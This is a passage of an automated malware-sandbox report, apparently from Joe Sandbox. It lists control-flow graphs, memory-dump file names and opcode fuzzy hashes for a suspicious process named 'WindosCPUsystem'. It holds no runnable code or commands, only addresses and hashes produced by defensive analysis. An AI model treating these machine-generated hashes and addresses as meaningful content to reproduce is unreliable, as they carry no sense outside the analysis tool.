                                                                                                        control_flow_graph 1750 7ff8490d7cd5-7ff8490d7d09 1753 7ff8490d7e52-7ff8490d7e5d 1750->1753 1754 7ff8490d7d0d-7ff8490d7d12 1750->1754 1756 7ff8490d7e8c-7ff8490d7ebf 1754->1756 1757 7ff8490d7d18-7ff8490d7d20 1754->1757 1759 7ff8490d7ec6-7ff8490d7f19 1756->1759 1757->1759 1760 7ff8490d7d26-7ff8490d7d4a 1757->1760 1775 7ff8490d7f1a-7ff8490d7f2d 1759->1775 1760->1754 1765 7ff8490d7d4c-7ff8490d7d56 1760->1765 1768 7ff8490d7d57-7ff8490d7d5b 1765->1768 1769 7ff8490d7e3e-7ff8490d7e51 1765->1769 1770 7ff8490d7d5c-7ff8490d7d5f 1768->1770 1771 7ff8490d7d60-7ff8490d7d6f 1770->1771 1772 7ff8490d7d7e-7ff8490d7d7f 1770->1772 1774 7ff8490d7d75-7ff8490d7d7c 1771->1774 1771->1775 1776 7ff8490d7d81-7ff8490d7d84 1772->1776 1774->1772 1774->1776 1784 7ff8490d7f37-7ff8490d7f48 1775->1784 1785 7ff8490d7f2f-7ff8490d7f36 1775->1785 1777 7ff8490d7d86-7ff8490d7dae 1776->1777 1778 7ff8490d7df8-7ff8490d7dff 1776->1778 1777->1768 1787 7ff8490d7db0-7ff8490d7df5 1777->1787 1778->1775 1780 7ff8490d7e05-7ff8490d7e38 1778->1780 1780->1769 1780->1770 1788 7ff8490d7f5a-7ff8490d7fc2 1784->1788 1789 7ff8490d7f4a-7ff8490d7f58 1784->1789 1785->1784 1787->1778 1795 7ff8490d7fc4-7ff8490d7fcc 1788->1795 1796 7ff8490d7ff7-7ff8490d8024 1788->1796 1789->1788 1799 7ff8490d7fd4-7ff8490d7fe7 1795->1799 1803 7ff8490d8132-7ff8490d8149 1796->1803 1804 7ff8490d802a-7ff8490d80a2 call 7ff8490d1bb0 call 7ff8490d1210 call 7ff8490d09b0 call 7ff8490d1210 call 7ff8490d0a20 call 7ff8490d1c00 call 7ff8490d6660 call 7ff8490d1210 1796->1804 1802 7ff8490d7fe9-7ff8490d7ff2 1799->1802 1805 7ff8490d8291-7ff8490d82a9 1802->1805 1810 7ff8490d814f-7ff8490d8258 call 7ff8490d1bb0 * 2 call 7ff8490d26f0 call 7ff8490d1210 call 7ff8490d09b0 call 7ff8490d1210 call 7ff8490d16c0 call 7ff8490d1de0 call 7ff8490d0950 call 7ff8490d1210 call 7ff8490d82fd 1803->1810 1811 7ff8490d825a-7ff8490d826f call 7ff8490d1210 call 7ff8490d0a28 1803->1811 1850 7ff8490d80a4-7ff8490d80b4 1804->1850 1813 7ff8490d82e2-7ff8490d82fc call 7ff8490d1de0 1805->1813 1814 7ff8490d82ab-7ff8490d82c2 1805->1814 1832 7ff8490d8274-7ff8490d8288 1810->1832 1811->1832 1827 7ff8490d82c4-7ff8490d82ce call 7ff8490d0850 1814->1827 1828 7ff8490d82d3-7ff8490d82dd call 7ff8490d27b0 1814->1828 1827->1828 1828->1813 1832->1805 1853 7ff8490d80b6-7ff8490d80e8 1850->1853 1853->1803
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 90c787cdd68b2f2f4b6f3a127e1a7e99c95e37e358be5d29d9e614d8e93fdac5
                                                                                                        • Instruction ID: c45e24c52beca7157c7c449cb89637e7a3867e90a7a37803a777d832b1ca78c3
                                                                                                        • Opcode Fuzzy Hash: 90c787cdd68b2f2f4b6f3a127e1a7e99c95e37e358be5d29d9e614d8e93fdac5
                                                                                                        • Instruction Fuzzy Hash: 00226431A1C98D8FDFA9EF68D4559B97BE1FF99380B0402B9D44DC7296DE24E842C780

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1871 7ff849023001-7ff849023107 1878 7ff849023109 1871->1878 1879 7ff84902310e-7ff849023126 1871->1879 1878->1879 1881 7ff849023778-7ff84902377c 1879->1881 1882 7ff849023783-7ff849023790 1881->1882 1883 7ff84902312b-7ff84902312f 1882->1883 1884 7ff849023796-7ff84902379b 1882->1884 1885 7ff849023131-7ff8490231fc 1883->1885 1886 7ff849023137-7ff84902313c 1883->1886 1887 7ff8490237da-7ff8490237f5 1884->1887 1888 7ff84902379d-7ff8490237af 1884->1888 1894 7ff8490231fe-7ff8490232cc 1885->1894 1895 7ff849023204-7ff849023209 1885->1895 1891 7ff8490231ab-7ff8490231f3 1886->1891 1892 7ff84902313e-7ff849023154 1886->1892 1891->1881 1892->1891 1901 7ff849023156-7ff849023161 1892->1901 1905 7ff8490232ce-7ff8490232cf 1894->1905 1906 7ff8490232d4-7ff8490232d9 1894->1906 1899 7ff849023278-7ff8490232c3 1895->1899 1900 7ff84902320b-7ff849023221 1895->1900 1899->1881 1900->1899 1908 7ff849023223-7ff84902322c 1900->1908 1910 7ff849023398-7ff84902339c 1905->1910 1911 7ff849023348-7ff849023393 1906->1911 1912 7ff8490232db-7ff8490232f1 1906->1912 1908->1899 1916 7ff84902339e-7ff84902346c 1910->1916 1917 7ff8490233a4-7ff8490233a9 1910->1917 1911->1881 1911->1910 1912->1911 1919 7ff8490232f3-7ff849023345 1912->1919 1927 7ff84902346e-7ff849023558 1916->1927 1928 7ff849023474-7ff849023479 1916->1928 1920 7ff849023418-7ff849023463 1917->1920 1921 7ff8490233ab-7ff8490233b8 1917->1921 1919->1911 1920->1881 1921->1920 1937 7ff84902355a-7ff849023644 1927->1937 1938 7ff849023560-7ff849023565 1927->1938 1931 7ff84902347f-7ff849023495 1928->1931 1932 7ff8490234fe-7ff84902354f 1928->1932 1931->1932 1944 7ff849023497-7ff8490234a9 1931->1944 1932->1881 1945 7ff84902364c-7ff849023651 1937->1945 1946 7ff849023646-7ff84902372e 1937->1946 1941 7ff84902356b-7ff849023581 1938->1941 1942 7ff8490235ea-7ff84902363b 1938->1942 1941->1942 1956 7ff849023583-7ff849023595 1941->1956 1942->1881 1944->1932 1953 7ff849023657-7ff84902366d 1945->1953 1954 7ff8490236d6-7ff849023725 1945->1954 1957 7ff84902376d-7ff849023771 1946->1957 1958 7ff849023730-7ff849023742 1946->1958 1953->1954 1965 7ff84902366f-7ff849023681 1953->1965 1971 7ff8490236b7 1954->1971 1972 7ff849023727 1954->1972 1956->1942 1957->1881 1958->1881 1965->1971 1971->1954 1972->1881
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2763926675.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff849020000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5aeb4ca65c710aabd851588d2fc6d508561cda93cb83c0697b19e4c9e444f4e2
                                                                                                        • Instruction ID: 934c740bc8f2156ac5e00ab2a1f2f4f3520d31a513e8cbde9249d7850206262d
                                                                                                        • Opcode Fuzzy Hash: 5aeb4ca65c710aabd851588d2fc6d508561cda93cb83c0697b19e4c9e444f4e2
                                                                                                        • Instruction Fuzzy Hash: AA129F71D0C98A9FEFB5EE2898552F977F5FF68B80F1401B6C40CD3192DA28AC858751

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1973 7ff849023b3b-7ff849023b3c 1974 7ff849023b3e-7ff849023b58 1973->1974 1975 7ff849023b86-7ff849023bf7 1973->1975 1980 7ff849023bf9 1975->1980 1981 7ff849023bfe-7ff849023c16 1975->1981 1980->1981 1983 7ff8490240cc-7ff8490240e4 1981->1983 1985 7ff849023c1b-7ff849023c1f 1983->1985 1986 7ff8490240ea-7ff8490240ef 1983->1986 1989 7ff849023c21-7ff849023c8e 1985->1989 1990 7ff849023c24-7ff849023c29 1985->1990 1987 7ff84902412e-7ff84902413d 1986->1987 1988 7ff8490240f1-7ff849024103 1986->1988 1988->1987 1996 7ff849023c90-7ff849023d13 1989->1996 1997 7ff849023c93-7ff849023c98 1989->1997 1993 7ff849023c2b-7ff849023c59 1990->1993 1994 7ff849023c5c-7ff849023c60 1990->1994 1993->1994 2002 7ff849023c67-7ff849023c85 1994->2002 2003 7ff849023d18-7ff849023d1d 1996->2003 2004 7ff849023d15-7ff849023d82 1996->2004 2000 7ff849023ccb-7ff849023cdf 1997->2000 2001 7ff849023c9a-7ff849023cc8 1997->2001 2021 7ff849023ce7-7ff849023cf8 2000->2021 2001->2000 2002->1983 2009 7ff849023d1f-7ff849023d4d 2003->2009 2010 7ff849023d50-7ff849023d79 2003->2010 2012 7ff849023d84-7ff849023deb 2004->2012 2013 7ff849023d87-7ff849023d8c 2004->2013 2009->2010 2010->1983 2027 7ff849023ded-7ff849023e74 2012->2027 2028 7ff849023df3-7ff849023df8 2012->2028 2018 7ff849023dbf-7ff849023dc3 2013->2018 2019 7ff849023d8e-7ff849023dbc 2013->2019 2031 7ff849023dca-7ff849023de2 2018->2031 2019->2018 2022 7ff849023d09-7ff849023d0a 2021->2022 2023 7ff849023cfa-7ff849023d02 2021->2023 2022->1983 2023->2022 2036 7ff849023e7c-7ff849023e81 2027->2036 2037 7ff849023e76-7ff849023efd 2027->2037 2029 7ff849023dfa-7ff849023e34 2028->2029 2030 7ff849023e37-7ff849023e59 2028->2030 2029->2030 2046 7ff849023e5b-7ff849023e63 2030->2046 2047 7ff849023e6a-7ff849023e6b 2030->2047 2031->1983 2041 7ff849023ec0-7ff849023ee2 2036->2041 2042 7ff849023e83-7ff849023ebd 2036->2042 2048 7ff849023eff-7ff849023f86 2037->2048 2049 7ff849023f05-7ff849023f0a 2037->2049 2056 7ff849023ef3-7ff849023ef4 2041->2056 2057 7ff849023ee4-7ff849023eec 2041->2057 2042->2041 2046->2047 2047->1983 2058 7ff849023f88-7ff84902400f 2048->2058 2059 7ff849023f8e-7ff849023f93 2048->2059 2052 7ff849023f49-7ff849023f6b 2049->2052 2053 7ff849023f0c-7ff849023f46 2049->2053 2069 7ff849023f6d-7ff849023f75 2052->2069 2070 7ff849023f7c-7ff849023f7d 2052->2070 2053->2052 2056->1983 2057->2056 2067 7ff849024011-7ff849024082 2058->2067 2068 7ff849024014-7ff849024019 2058->2068 2063 7ff849023fd2-7ff849023ff4 2059->2063 2064 7ff849023f95-7ff849023fa7 2059->2064 2076 7ff849024005-7ff849024006 2063->2076 2077 7ff849023ff6-7ff849023ffe 2063->2077 2064->2063 2079 7ff8490240c1-7ff8490240c5 2067->2079 2080 7ff849024084-7ff8490240be 2067->2080 2074 7ff849024058-7ff84902407b 2068->2074 2075 7ff84902401b-7ff849024055 2068->2075 2069->2070 2070->1983 2074->1983 2075->2074 2076->1983 2077->2076 2079->1983 2080->2079
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2763926675.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff849020000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ff4253166b4bb6c7d0336069c0121cd1296867b302afcc737d696cbd346338d4
                                                                                                        • Instruction ID: f47591ba878002625274309d62eb2ccc029ed06667ac0b463faa8654d65a852d
                                                                                                        • Opcode Fuzzy Hash: ff4253166b4bb6c7d0336069c0121cd1296867b302afcc737d696cbd346338d4
                                                                                                        • Instruction Fuzzy Hash: DC12D530D0C65ACFEBA4EF68C8956B977B1FF69745F5001B9D009A7292CB38AC85CB41

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2089 7ff8490dc81d-7ff8490dc843 2091 7ff8490dc855-7ff8490dc859 2089->2091 2092 7ff8490dc845-7ff8490dc84e 2089->2092 2093 7ff8490dc867-7ff8490dc874 2091->2093 2094 7ff8490dc85b-7ff8490dc866 2091->2094 2092->2091 2095 7ff8490dcb38-7ff8490dcb7a 2093->2095 2096 7ff8490dc87a-7ff8490dc889 2093->2096 2105 7ff8490dcb96-7ff8490dcb9f 2095->2105 2106 7ff8490dcb7c-7ff8490dcb94 2095->2106 2097 7ff8490dc898-7ff8490dc8a1 2096->2097 2098 7ff8490dc88b-7ff8490dc897 2096->2098 2100 7ff8490dc8a7-7ff8490dc8b3 2097->2100 2101 7ff8490dca51-7ff8490dca78 2097->2101 2100->2095 2104 7ff8490dc8b9-7ff8490dc8ce 2100->2104 2113 7ff8490dca7f-7ff8490dcaa6 2101->2113 2107 7ff8490dc8d0-7ff8490dc8dc 2104->2107 2108 7ff8490dc8dd-7ff8490dc8e1 2104->2108 2109 7ff8490dcba1-7ff8490dcbb8 2105->2109 2110 7ff8490dcbbb-7ff8490dcbd6 2105->2110 2106->2110 2112 7ff8490dc8e7-7ff8490dc8f3 2108->2112 2108->2113 2109->2110 2117 7ff8490dcbfe-7ff8490dcc00 2110->2117 2118 7ff8490dcbd8-7ff8490dcbdf 2110->2118 2112->2095 2114 7ff8490dc8f9-7ff8490dc90e 2112->2114 2128 7ff8490dcaad-7ff8490dcab8 2113->2128 2119 7ff8490dc910-7ff8490dc915 2114->2119 2120 7ff8490dc91a-7ff8490dc91e 2114->2120 2123 7ff8490dcc23-7ff8490dcc25 2117->2123 2124 7ff8490dcc02-7ff8490dcc05 2117->2124 2118->2117 2121 7ff8490dcbe1-7ff8490dcbe5 2118->2121 2126 7ff8490dca49-7ff8490dca50 2119->2126 2127 7ff8490dc924-7ff8490dc930 2120->2127 2120->2128 2121->2117 2131 7ff8490dcc27-7ff8490dcc29 2123->2131 2132 7ff8490dcc2b-7ff8490dcc35 2123->2132 2124->2123 2130 7ff8490dcc07-7ff8490dcc21 2124->2130 2127->2095 2134 7ff8490dc936-7ff8490dc94b 2127->2134 2140 7ff8490dcb14-7ff8490dcb37 2128->2140 2141 7ff8490dcaba-7ff8490dcad4 2128->2141 2130->2123 2146 7ff8490dcbe7-7ff8490dcbf5 2130->2146 2131->2132 2133 7ff8490dcc36-7ff8490dcc9d 2131->2133 2136 7ff8490dc957-7ff8490dc95b 2134->2136 2137 7ff8490dc94d-7ff8490dc952 2134->2137 2143 7ff8490dc961-7ff8490dc968 2136->2143 2144 7ff8490dcadb-7ff8490dcb02 2136->2144 2137->2126 2140->2095 2141->2144 2143->2095 2148 7ff8490dc96e-7ff8490dc985 2143->2148 2155 7ff8490dcb09-7ff8490dcb12 2144->2155 2146->2117 2151 7ff8490dcbf7-7ff8490dcbfb 2146->2151 2152 7ff8490dc987-7ff8490dc98c 2148->2152 2153 7ff8490dc991-7ff8490dc993 2148->2153 2151->2117 2152->2126 2153->2155 2156 7ff8490dc999-7ff8490dc99f 2153->2156 2155->2140 2156->2155 2160 7ff8490dc9a5-7ff8490dc9a9 2156->2160 2160->2155 2162 7ff8490dc9af-7ff8490dc9bf 2160->2162 2162->2095 2164 7ff8490dc9c5-7ff8490dc9ce 2162->2164 2164->2155 2165 7ff8490dc9d4-7ff8490dc9dc 2164->2165 2165->2095 2166 7ff8490dc9e2-7ff8490dc9eb 2165->2166 2166->2155 2167 7ff8490dc9f1-7ff8490dc9f9 2166->2167 2167->2095 2168 7ff8490dc9ff-7ff8490dca08 2167->2168 2168->2155 2169 7ff8490dca0e-7ff8490dca16 2168->2169 2169->2095 2170 7ff8490dca1c-7ff8490dca25 2169->2170 2170->2155 2171 7ff8490dca2b-7ff8490dca30 2170->2171 2171->2095 2172 7ff8490dca36-7ff8490dca3e 2171->2172 2172->2155 2173 7ff8490dca44 2172->2173 2173->2126
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f864d855823de003235ca12de9e5568213343d4bc76421bd3030a7d32928330a
                                                                                                        • Instruction ID: 331843a5794b54a19e088b7ad23e2c8dd273810667985536d2bbf264664932ea
                                                                                                        • Opcode Fuzzy Hash: f864d855823de003235ca12de9e5568213343d4bc76421bd3030a7d32928330a
                                                                                                        • Instruction Fuzzy Hash: C2D1F730A1CB964FEB79AA6C94542B577D6EF543A8F24477DC09BC32C2DE28E8428741
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9f601fb1dc54f271140dd51cc210e4757893f23094da458dab2ab9c3b6fc31ff
                                                                                                        • Instruction ID: 1a2694fe31939b2007fd7892da2d7f1a142746c49489f5bffca2aed157cb97b3
                                                                                                        • Opcode Fuzzy Hash: 9f601fb1dc54f271140dd51cc210e4757893f23094da458dab2ab9c3b6fc31ff
                                                                                                        • Instruction Fuzzy Hash: 2FB1B430B1CA494FEBA8EF6C9455AB977E1EF59750F044279D04EC7292DD28EC428781
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f409f611a417d11a708d2aadac6448fd3b5d2a24ace9e2f3dc843e29968a11f6
                                                                                                        • Instruction ID: 73cc689979f7c62d6b01b5c57d0003ff1f4e3bbbd78ab11b836719344d67ae50
                                                                                                        • Opcode Fuzzy Hash: f409f611a417d11a708d2aadac6448fd3b5d2a24ace9e2f3dc843e29968a11f6
                                                                                                        • Instruction Fuzzy Hash: 64C12631A0DAC64FEBB5EB3884556B57BE1FF59390B1801BAD44DC7293DE28EC468341
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1a8a64a91f5a4f4a175f85c19b72d3568f42af16240111fc5b4fa54321d9660d
                                                                                                        • Instruction ID: f433ea344b131570261dcc0e07c4be9095bd61e10fa4b705641feb5b3f4096cc
                                                                                                        • Opcode Fuzzy Hash: 1a8a64a91f5a4f4a175f85c19b72d3568f42af16240111fc5b4fa54321d9660d
                                                                                                        • Instruction Fuzzy Hash: 8AA17B31E0CACB4FEB69AB3C94512B577D5EF95355F0402BAD04EC7582DE2CE8468381
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 82a467ea565c002d537fbc2622569fe3e876f7cbc983eae3c4d435d3bf586660
                                                                                                        • Instruction ID: 0fc5f266df35108161d765edb9a93b83f3ea91e3faf91c0184d7054cbcbdb8df
                                                                                                        • Opcode Fuzzy Hash: 82a467ea565c002d537fbc2622569fe3e876f7cbc983eae3c4d435d3bf586660
                                                                                                        • Instruction Fuzzy Hash: 76C15E3091CA898FDFE8EF18C456AA977E5FF59380F1406A9E44DC7292CE34E856C781
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2763926675.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff849020000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 74a92fc3e3910ecfef28134879cd8f7bb1295b79c655958e0ca4bbfcccce42c1
                                                                                                        • Instruction ID: 35312ef8a20c0799957395fb4b06c1db6639a7d1204eb6ad7d020ca64cadf7e8
                                                                                                        • Opcode Fuzzy Hash: 74a92fc3e3910ecfef28134879cd8f7bb1295b79c655958e0ca4bbfcccce42c1
                                                                                                        • Instruction Fuzzy Hash: 1AC14931D0C69A8EEFA5EF6884557B97BB1FF59344F1400B9D40DE7292DA78AC81CB40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b57d6baa81841e1d92c09e9401135396f21aee0de1e20037a6e18cebd183c667
                                                                                                        • Instruction ID: 1867d703713ce2038c10c16bcc1ba08f79d15f1d90d5e1e5525cd40a5a273e0a
                                                                                                        • Opcode Fuzzy Hash: b57d6baa81841e1d92c09e9401135396f21aee0de1e20037a6e18cebd183c667
                                                                                                        • Instruction Fuzzy Hash: 89A16C30B1CA598FEFA8EF6C9455AB9B7E5FF59740B040279D44EC3296CE24EC418781
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 614738e64f63988ef7750ac932d0619f6f67007893f84789c06e991935fa8517
                                                                                                        • Instruction ID: d74c88e9416660b791296d9a074e54b15e61246997889921bd69da01a41a95fe
                                                                                                        • Opcode Fuzzy Hash: 614738e64f63988ef7750ac932d0619f6f67007893f84789c06e991935fa8517
                                                                                                        • Instruction Fuzzy Hash: FAA1A371E0D9998FDFB8EE288851BA977A5EF99340F0442F9D44DD3282CE34ED858781
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b11fff6916ca884535aa0cfadae82d88324e299e98e7b434842e33682cb642e6
                                                                                                        • Instruction ID: 68c0401f8bbae6fcd3a4d03d8fb14cae9fe49f0885184f89ed714cba4e2d6d12
                                                                                                        • Opcode Fuzzy Hash: b11fff6916ca884535aa0cfadae82d88324e299e98e7b434842e33682cb642e6
                                                                                                        • Instruction Fuzzy Hash: 9AA1003061C9898FEF99EF2CD455AA977E1FFA8340B5441A9E44DC7296CE35EC82C780
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 23f977f8f5b878980e38f067b219178d5cf1b7fe43e798801bfbb0d5a84a3cc1
                                                                                                        • Instruction ID: 85f6896f5f96a6bcf5e85d1093d6916135a19395bd05856339fa7f3be9ddb7a6
                                                                                                        • Opcode Fuzzy Hash: 23f977f8f5b878980e38f067b219178d5cf1b7fe43e798801bfbb0d5a84a3cc1
                                                                                                        • Instruction Fuzzy Hash: 3181E521B0DDCA8FEBA6EB2C58156743BD5EF55780B1901BAD08DC72D3DE18EC468341
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e293abe58da848711e70deca304a5675eead0a4917bcb7923839fc68af7f43c5
                                                                                                        • Instruction ID: 5ae9efae934fb1ab5fb5aafd3d17314d36c621f7508d034d9a19f7d898dccb5f
                                                                                                        • Opcode Fuzzy Hash: e293abe58da848711e70deca304a5675eead0a4917bcb7923839fc68af7f43c5
                                                                                                        • Instruction Fuzzy Hash: 7C91B630B0C9598FDBA8FF6894556B9B7E5FF99350F0046B9D04EC7292CE28EC428780
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 970da1f9fece24961b626d753564e55660c94019968a615528d079dc517be7e6
                                                                                                        • Instruction ID: 4fe3c6bea46debd9bb674707fe6a39b396eb1c923aff953dd30e130bc51beec9
                                                                                                        • Opcode Fuzzy Hash: 970da1f9fece24961b626d753564e55660c94019968a615528d079dc517be7e6
                                                                                                        • Instruction Fuzzy Hash: FC914831D0DBD64FEBA5EF3894491657BD0EF65690B0806FEC089CB5D3DE29E8868341
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 702f1825796815126221fdfd86a2037b79d3e566764d60fe30b432bc3b65dc16
                                                                                                        • Instruction ID: 6740e5c2c80cf772895fb0182f6f3b69c7d01864d5918983dea78ecce6f1699a
                                                                                                        • Opcode Fuzzy Hash: 702f1825796815126221fdfd86a2037b79d3e566764d60fe30b432bc3b65dc16
                                                                                                        • Instruction Fuzzy Hash: E1919375A1CB8A8FDB98EE1CC4917B577E1FF58744F14066DD88A87282CB38E852CB41
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4d5fdb8ad39bbe0eb6d81671d4122be92b9cb9f22a76ac3086a8270c48a6e4d2
                                                                                                        • Instruction ID: 8380bb977b4128ca07b2c0c1c1272170a0367394ba2ab0ed84bf3e8f00036fe7
                                                                                                        • Opcode Fuzzy Hash: 4d5fdb8ad39bbe0eb6d81671d4122be92b9cb9f22a76ac3086a8270c48a6e4d2
                                                                                                        • Instruction Fuzzy Hash: 8261A131A0C9898FEFA5EF2CD4556A937E1FFA9750B0506B9D40DC7286CE24EC42C781
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 42ce4f6f7723d8c4dc9cb1e84545ab77e45c4ce9a78c3a36606dcc06f184ade7
